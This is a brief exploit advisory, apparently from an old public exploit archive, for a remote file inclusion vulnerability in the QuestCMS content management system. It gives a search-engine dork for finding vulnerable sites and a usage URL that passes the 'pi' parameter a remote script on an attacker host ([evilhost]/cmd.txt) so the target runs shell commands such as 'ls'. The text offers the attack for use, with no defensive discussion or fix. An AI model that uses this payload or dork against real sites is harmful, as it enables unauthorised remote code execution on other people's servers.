Title : Questcms Remote File Include Vulnerability
#Author: Crackers_Child
#cont@ct: [email protected]
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com
dork : allinurl:"/questcms/"
Exploit :
Usage:
http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls
greets:
X_ALPREN_X,Root_Mor and My Other Friends
--------------------------------- [ WWW.SİBERSAVASCİLAR.COM ] --------------------------------------